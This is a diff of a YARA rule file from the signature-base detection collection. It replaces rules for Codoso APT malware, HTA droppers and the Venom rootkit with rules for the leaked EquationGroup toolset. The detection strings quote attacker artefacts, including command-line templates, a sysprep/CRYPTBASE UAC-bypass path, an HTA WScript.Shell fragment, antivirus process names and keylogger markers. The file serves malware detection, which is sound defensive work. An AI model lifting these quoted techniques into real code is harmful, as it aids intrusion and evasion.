-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L192-L208"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3096-L3111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e248bada3ac46611bbe2cf1e1afee902191a2c1fb9611c4a052318e5e093b015"
+		logic_hash = "8946bc6d1812a998757a4032755f37aa2be6121a958ebfb6fec90fa60da038fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+		hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
 
 	strings:
-		$s1 = "/c del %s >> NUL" fullword ascii
-		$s2 = "%s%s.manifest" fullword ascii
+		$x1 = "* Encrypted log found.  An encryption key must be provided" fullword ascii
+		$x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii
+		$x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Activedirectory_Target : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24d9e64c-4b35-5737-92ae-8ec391d494c7"
-		date = "2016-01-30"
+		id = "1069cabe-7c09-522f-ad3f-05651490b921"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L209-L247"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3113-L3127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "799ae0946464e5b4980f792e525da9eec46aa7844ec977f892a80f58d8b22afd"
+		logic_hash = "0dee634fe81870b21531046be512e9e54b127207c1910ca5ce5dfab63b1d0603"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
-		hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
-		hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
+		hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
 
 	strings:
-		$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
-		$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
-		$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$x4 = "\\\\.\\keymmdrv1" fullword ascii
-		$s1 = "spideragent.exe" fullword ascii
-		$s2 = "AVGIDSAgent.exe" fullword ascii
-		$s3 = "kavsvc.exe" fullword ascii
-		$s4 = "mspaint.exe" fullword ascii
-		$s5 = "kav.exe" fullword ascii
-		$s6 = "avp.exe" fullword ascii
-		$s7 = "NAV.exe" fullword ascii
-		$c1 = "Elevation:Administrator!new:" wide
-		$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
-		$c3 = "\\sysprep\\sysprep.exe" wide
-		$c4 = "\\sysprep\\CRYPTBASE.dll" wide
-		$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
-		$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
-		$c7 = "\\sysprep" wide
-		$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
+		$s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+		$s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) or 4 of ( $c* ) ) or 1 of ( $x* ) or 6 of ( $c* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Legacy_Dll : HIGHVOL FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c1c753a6-77b6-5bfb-89f9-16127c264fd0"
-		date = "2016-01-30"
+		id = "254ff1f7-52ee-57fa-be02-2904e132e25c"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L248-L275"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3129-L3144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f24100c0fe837511ce6144224eda397fed3931072e364f1b5be49c7bb4102aa4"
+		logic_hash = "923a595737bc83fe05d0ca7301c70e1cb03cecf97dfa99f5967b77b892a9a533"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
-		hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
-		hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+		hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
 
 	strings:
-		$x1 = "dropper, Version 1.0" fullword wide
-		$x2 = "dropper" fullword wide
-		$x3 = "DROPPER" fullword wide
-		$x4 = "About dropper" fullword wide
-		$s1 = "Microsoft Windows Manager Utility" fullword wide
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii
-		$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii
-		$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii
+		$op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 }
+		$op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 }
+		$op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of ( $x* ) and 2 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Codoso_Plugx_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Svctouch : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af777818-5cff-5571-b5e9-0f5a4c8b08ff"
-		date = "2016-01-30"
+		id = "a1246afa-32ba-5730-91a2-b1116160d662"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L276-L294"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3146-L3159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34736c85699a94b1413e5f9934e1a55841e8296df61d558bccf2d477e545d156"
+		logic_hash = "0e876611ffe4740141a0454f68cfc7dd3c46e0fd44deeb9f3e0f66c8fccd3745"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
-		hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
-		hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
+		hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
 
 	strings:
-		$s1 = "GETPASSWORD1" fullword ascii
-		$s2 = "NvSmartMax.dll" fullword ascii
-		$s3 = "LICENSEDLG" fullword ascii
+		$s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_3
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Pwd_Implant : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08003dba-1201-5f74-9edd-ea321bb26e99"
-		date = "2016-01-30"
+		id = "69d071f0-7214-5972-805a-3c0c1d2346c2"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L295-L314"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3161-L3176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "371a91b08747b8025baba79797baf9f29487f9c3541f27fc2c2716b531d30b54"
+		logic_hash = "f565c42781ff4b0b37e7c00673fb2da2877018317cd415bdb47d4e019485c727"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
-		hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
-		hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
-		hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+		hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
 
 	strings:
-		$x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
+		$s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii
+		$op1 = { 40 50 89 44 24 18 FF 15 34 20 00 }
 
 	condition:
-		$x1
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Kisucomms_Target_2000 : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4c00806-3092-5ec2-844f-b638c31fa6a5"
-		date = "2016-01-30"
+		id = "693a82e5-a3f1-5a56-b33d-0daef36bbe5f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L315-L337"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3178-L3198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7eab3d398b5172127383047de7106a9713ec5b149f8e8ca1506b3382b007f648"
+		logic_hash = "7d350228ad779d0453c1077afb2b533036eb1e43e4f74a433d68c781db963ab1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+		hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
 
 	strings:
-		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
-		$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
-		$s2 = "Help and Support" fullword ascii
-		$s3 = "netsvcs" fullword ascii
-		$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii
-		$s10 = "winlogon" fullword ascii
-		$s11 = "System\\CurrentControlSet\\Services" fullword ascii
+		$s1 = "363<3S3c3l3q3v3{3" fullword ascii
+		$s2 = "3!3%3)3-3135393@5" fullword ascii
+		$op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b }
+		$op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 }
+		$op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sldecoder : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9487773a-01d9-558e-8866-b8a8650996ba"
-		date = "2016-01-30"
+		id = "1760e84b-fc40-5d60-9351-3a3134af9e9f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L339-L367"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3200-L3214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8cecf96c7732becf83eb900bc36fa44daee466da6b483ea4f8c25ae9aeffcb7b"
+		logic_hash = "81a74169dc8f93f314f384bd859df07a4ffaaf430b221b440de922fad3497535"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
-		hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
-		hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
-		hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
-		hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
 
 	strings:
-		$x1 = "DRIVERS\\ipinip.sys" fullword wide
-		$s1 = "TsWorkSpaces.dll" fullword ascii
-		$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
-		$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
-		$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
-		$s5 = "Microsoft Chart ActiveX Control" fullword wide
-		$s6 = "MSChartCtrl.ocx" fullword wide
-		$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
-		$s8 = "WUServiceMain" fullword ascii
-		$s9 = "Cookie: pgv_pvid=" ascii
+		$x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide
+		$x2 = "KeyLogger_Data" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 3 of them ) ) or 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Sysinternals_Tool_Anomaly : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Windows_Implant : FILE
 {
 	meta:
-		description = "SysInternals Tool Anomaly - does not contain Mark Russinovich as author"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b676726b-7ecd-52ed-bdec-3d81b7596246"
-		date = "2016-12-06"
+		id = "a82aac49-8843-5420-8b87-f3d7431bc63f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sysinternals_anomaly.yar#L10-L31"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3216-L3229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "760795a51965197bd101ffbf0f7c8cfbbb16d2f443d0941de4a75c8f33f4cad0"
-		score = 50
+		logic_hash = "5b6b349c98a328b4bbdd6d8718af8477c36ec219bb0076dd56998395d0ef5f32"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
 
 	strings:
-		$s1 = "Software\\Sysinternals\\%s" fullword ascii
-		$n1 = "Mark Russinovich" wide ascii
-		$nfp1 = "<<<Obsolete>>>" fullword wide
-		$nfp2 = "BGInfo - Wallpaper text configurator" wide
-		$nfp3 = "usage: movefile [source] [dest]" wide
-		$nfp4 = "LoadOrder information has been copied" wide
-		$nfp5 = "Cache working set cleared" wide
+		$s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $s1 and not $n1 and not 1 of ( $nfp* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_HTA_With_Wscript_Shell
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgkd_Msslu64_Msgki_Mssld : FILE
 {
 	meta:
-		description = "Detects WScript Shell in HTA"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2faf74b1-c19c-53f0-ad08-be9caf5640bc"
-		date = "2017-06-21"
+		id = "cb6d4098-8ede-58ba-9851-7c8b360fb606"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hta_anomalies.yar#L11-L26"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3231-L3256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ce2728fbd3023a6b96291cdb63f30dc9b71e5fc506f8b00ad97e3062b103478"
-		score = 80
+		logic_hash = "f61ce58356ffca197d4a2a4aae43414bcb8f2f284dbee818124dd450f4b50cb9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
+		hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
+		hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
+		hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
+		hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e"
+		hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46"
 
 	strings:
-		$s1 = "<hta:application windowstate=\"minimize\"/>"
-		$s2 = "<script>var b=new ActiveXObject(\"WScript.Shell\");" ascii
+		$s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii
+		$s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii
+		$s3 = "iijymqp" fullword ascii
+		$s4 = "AWAVAUATASARAQI" fullword ascii
+		$s5 = "WARASATAUAVM" fullword ascii
+		$op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc }
+		$op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 }
+		$op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_HTA_Embedded
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallback : FILE
 {
 	meta:
-		description = "Detects an embedded HTA file"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "04d4c718-9dd6-5528-8712-61c9f2a16139"
-		date = "2017-06-21"
+		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hta_anomalies.yar#L28-L42"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3258-L3272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "843f0ad5e39e5492db8ff7372f6d2038e7dbb7823ec9b33f863ab891a108b1ec"
-		score = 50
+		logic_hash = "63a17dd56874085753cae92f70d6248ceaac6eaea99fda0d3a551e4988a73895"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
+		hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
 
 	strings:
-		$s1 = "<hta:application windowstate=\"minimize\"/>"
+		$s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii
+		$s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii
 
 	condition:
-		$s1 and not $s1 in ( 0 .. 50000 )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Venom_Rootkit : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Doublefeaturereader_Doublefeaturereader_0 : FILE
 {
 	meta:
-		description = "Venom Linux Rootkit"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fedc6fa9-7dfb-5e54-a7bf-9a16f96d6886"
-		date = "2017-01-12"
+		id = "f662c961-80be-5453-86b1-c4d40ac5b732"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://security.web.cern.ch/security/venom.shtml"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_venom_linux_rootkit.yar#L10-L32"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3274-L3293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b2211edc6737e9da3e43bec9ef823e80c6bd6463adbb10d6839e9914aed22ac"
+		logic_hash = "9049e1fe31917ecc27e57afecd5845afcd966aac83d386b7c0995c1e3378a0d0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927"
+		hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae"
 
 	strings:
-		$s1 = "%%VENOM%CTRL%MODE%%" ascii fullword
-		$s2 = "%%VENOM%OK%OK%%" ascii fullword
-		$s3 = "%%VENOM%WIN%WN%%" ascii fullword
-		$s4 = "%%VENOM%AUTHENTICATE%%" ascii fullword
-		$s5 = ". entering interactive shell" ascii fullword
-		$s6 = ". processing ltun request" ascii fullword
-		$s7 = ". processing rtun request" ascii fullword
-		$s8 = ". processing get request" ascii fullword
-		$s9 = ". processing put request" ascii fullword
-		$s10 = "venom by mouzone" ascii fullword
-		$s11 = "justCANTbeSTOPPED" ascii fullword
+		$x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii
+		$x2 = "Double Feature Target Version" fullword ascii
+		$x3 = "DoubleFeature Process ID" fullword ascii
+		$op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 }
 
 	condition:
-		filesize < 4000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_SUSP_CMD_Var_Expansion : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Vtuner_Vtuner_1 : FILE
 {
 	meta:
-		description = "Detects Office droppers that include a variable expansion string"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f3ebea0-1d33-513d-b32b-9d87607525e8"
-		date = "2018-09-26"
+		id = "3794f30b-39dc-59eb-9fd3-4c7837bfd47d"
+		date = "2017-04-15"
